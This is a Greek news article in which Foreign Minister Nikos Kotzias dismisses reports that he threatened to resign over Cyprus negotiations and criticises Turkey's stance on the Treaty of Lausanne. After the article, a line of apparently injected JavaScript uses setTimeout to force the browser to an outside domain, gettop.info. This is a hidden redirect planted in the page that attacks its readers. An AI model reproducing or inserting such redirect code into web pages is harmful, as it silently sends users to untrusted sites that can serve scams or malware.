Κοτζιάς: «Γελοιότητες» ότι απείλησα με παραίτηση από το ΥΠΕΞ

0
16

Ο υπουργός Εξωτερικών Νίκος Κοτζιάς  χαρακτήρισε «γελοιότητες» τις πληροφορίες ότι απείλησε με παραίτηση στην περίπτωση που γίνονταν αποδεκτές οι αξιώσεις της Τουρκίας για παραμονή στρατευμάτων κατοχής στην Κύπρο και σταδιακή αποχώρησή τους τα επόμενα χρόνια, καθώς και για διατήρηση του καθεστώτος εγγυήσεων. Μίλησε για σχεδιασμένη και σκοτεινή επίθεση εναντίον του και σημείωσε πως σε αυτή την κρίσιμη φάση για τη χώρα δεν θα κάνει τη χάρη σε κανέναν να παραιτηθεί.

Για όσους τον κατηγορούν ως «εθνικιστή» είπε: «Μου λένε όμως ότι το να παλεύεις για την κατάργηση των εγγυήσεων, για να φύγουν τα κατοχικά στρατεύματα της Τουρκίας από την Κύπρο είναι εθνικισμός, ενώ είναι σύγχρονος ευρωπαϊσμός να κατέχει η Τουρκία ευρωπαϊκά εδάφη! Συχνά αυτοί που κατηγορούν για εθνικισμό την πατριωτική Αριστερά είναι φορείς του εθνικισμού της άλλης πλευράς«.

Προσερχόμενος σε εκδήλωση της Κίνησης Ιδεών και Πράξης «Πράττω», στη Θεσσαλονίκη, τόνισε ακόμη ότι «εμείς δουλεύουμε σταθερά για την ενότητα της Κύπρου, για τα δικαιώματα όλων των Κυπρίων. Το Κυπριακό πρόβλημα πρέπει να λυθεί όχι για να εξυπηρετηθούν τα γεωπολιτικά και γεωστρατηγικά συμφέροντα τρίτων, αλλά για να εξυπηρετηθεί μόνο ο κυπριακός λαός, η ειρήνη και η σταθερότητα στην περιοχή«.

Σχετικά με τις προκλητικές δηλώσεις Ερντογάν και την αμφισβήτηση της Συνθήκης της Λωζάννης ο κ. Κοτζιάς έκανε λόγο για «νευρικότητα» από την πλευρά της Τουρκίας και ανέφερε ότι η Ελλάδα πρέπει να αντιδράσει με ψυχραιμία και νηφαλιότητα και να μην αφήσει η νευρικότητα της Αγκυρας να δημιουργήσει ανθελληνικό μέτωπο.

Η Τουρκία είναι αναθεωρητική δύναμη είπε ο κ. Κοτζιάς και απευθυνόμενος στον πρόεδρο Ερντογάν έθεσε το ρητορικό ερώτημα, μήπως επιθυμεί να επιστρέψουμε στη Συνθήκη των Σεβρών.

Στη διάρκεια της ομιλίας του ως πρόεδρος της Κίνησης «Πράττω», ο κ. Κοτζιάς είπε ότι πολλές πλευρές της Συνθήκης της Λωζάννης δεν έχουν εφαρμοστεί από την Τουρκία. «Να πω ότι σύμφωνα με τη Συνθήκη της Λωζάννης η Ιμβρος και η Τένεδος είναι αυτοδιοικούμενες περιοχές; Να πω ότι σύμφωνα με τη Συνθήκη της Λωζάννης θα έπρεπε οι 246.000 ομογενείς Έλληνες στην Κωνσταντινούπολη να είναι σήμερα και 80.000 μουσουλμάνοι στη Θράκη, ενώ σήμερα έχουμε 130.000 μουσουλμάνους -και καλά κάνουν και αβγατίζουν-και 2.500 Ελληνες ομογενείς στην Κωνσταντινούπολη; Εδώ υπήρξε συνέχεια των παραβιάσεων«, επισήμανε.

 

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here